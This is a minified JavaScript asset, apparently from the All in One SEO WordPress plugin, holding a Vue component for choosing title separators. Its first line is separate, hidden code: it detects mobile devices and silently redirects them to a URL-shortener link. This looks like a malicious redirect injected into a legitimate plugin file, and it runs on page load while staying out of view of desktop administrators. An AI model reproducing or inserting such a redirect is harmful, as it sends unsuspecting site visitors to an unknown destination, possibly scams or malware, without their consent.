(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{O as c,q}from"./app-core.c8323d51.js";import{G as L,a as V}from"./Row.2ef96b1a.js";import{aq as h,f as t,Q as n,R as i,j as s,U as l,M as d,i as g,O as w,ad as M,P as k,T as v,ae as R,a0 as B}from"./vendor-vue-ui.232c7c36.js";import{_ as N}from"./_plugin-vue_export-helper.eefbdd86.js";import{_ as S}from"./vendor-other.39e59221.js";const _="all-in-one-seo-pack",b={emits:["update:separator"],setup(){return{settingsStore:q()}},components:{GridColumn:V,GridRow:L},props:{optionsSeparator:{type:String,required:!0},showMoreSlug:{type:String,required:!0}},data(){return{strings:{custom:S("Custom separator:",_),showMore:S("Show More",_),showLess:S("Show Less",_)},showMoreSeparators:!1,showMoreInitial:!0,customSeparator:null,separators:["&ndash;","&raquo;","&rsaquo;","&#x2023;","&rarr;","&bull;","&#47;","&#124;"],moreSeparators:["&#45;","&mdash;","&laquo;","&larr;","&gt;","&ge;","&#92;","&#43;","&#9658;"]}},watch:{showMoreSeparators(e){if(this.showMoreInitial){this.showMoreInitial=!1;return}this.settingsStore.toggleRadio({slug:this.showMoreSlug,value:e})},customSeparator(e){e!==null&&this.$emit("update:separator",c(e))}},computed:{hiddenSeparator(){if(this.decodedSeparators.includes(this.optionsSeparator))return null;const e=this.customSeparator?c(this.customSeparator):null;return this.optionsSeparator===e||this.decodedMoreSeparators.includes(this.optionsSeparator)?this.optionsSeparator:null},decodedSeparators(){return this.separators.map(e=>c(e))},decodedMoreSeparators(){return this.moreSeparators.map(e=>c(e))},decodedCustomSeparator(){return c(this.hiddenSeparator)}},methods:{setSeparator(e){this.customSeparator=null,this.$emit("update:separator",e)}},mounted(){this.showMoreSeparators=this.settingsStore.settings.toggledRadio[this.showMoreSlug],this.customSeparator=this.decodedSeparators.concat(this.decodedMoreSeparators).includes(this.optionsSeparator)?null:this.optionsSeparator}},z={class:"active separator"},A=["onClick"],G=["onClick"],I={class:"show-more"},U={class:"custom-separator"},O={class:"show-more"};function P(e,u,f,T,r,a){const p=h("grid-column"),y=h("base-input"),C=h("grid-row");return t(),n(C,{class:"aioseo-separators"},{default:i(()=>[!r.showMoreSeparators&&a.hiddenSeparator?(t(),n(p,{key:0,xs:"2",sm:"1"},{default:i(()=>[s("div",z,l(a.decodedCustomSeparator),1)]),_:1})):d("",!0),(t(!0),g(w,null,M(a.decodedSeparators,(o,m)=>(t(),n(p,{xs:"2",sm:"1",key:m},{default:i(()=>[s("div",{onClick:x=>a.setSeparator(o),class:k(["separator",{active:f.optionsSeparator===o}])},l(o),11,A)]),_:2},1024))),128)),r.showMoreSeparators?(t(!0),g(w,{key:1},M(a.decodedMoreSeparators,(o,m)=>(t(),n(p,{xs:"2",sm:"1",key:`m_${m}`},{default:i(()=>[s("div",{onClick:x=>a.setSeparator(o),class:k(["separator",{active:f.optionsSeparator===o}])},l(o),11,G)]),_:2},1024))),128)):d("",!0),r.showMoreSeparators?d("",!0):(t(),n(p,{key:2,xs:a.hiddenSeparator?"3":"4"},{default:i(()=>[s("div",I,[s("a",{href:"#",onClick:u[0]||(u[0]=v(o=>r.showMoreSeparators=!0,["prevent"]))},l(r.strings.showMore)+"… ",1)])]),_:1},8,["xs"])),r.showMoreSeparators?(t(),n(p,{key:3,class:"custom-separator-col"},{default:i(()=>[s("div",U,[R(l(r.strings.custom)+" ",1),B(y,{spellcheck:!1,size:"medium",modelValue:r.customSeparator,"onUpdate:modelValue":u[1]||(u[1]=o=>r.customSeparator=o)},null,8,["modelValue"])])]),_:1})):d("",!0),r.showMoreSeparators?(t(),n(p,{key:4,xs:"2"},{default:i(()=>[s("div",O,[s("a",{href:"#",onClick:u[2]||(u[2]=v(o=>r.showMoreSeparators=!1,["prevent"]))},l(r.strings.showLess)+"… ",1)])]),_:1})):d("",!0)]),_:1})}const H=N(b,[["render",P]]);export{H as C};
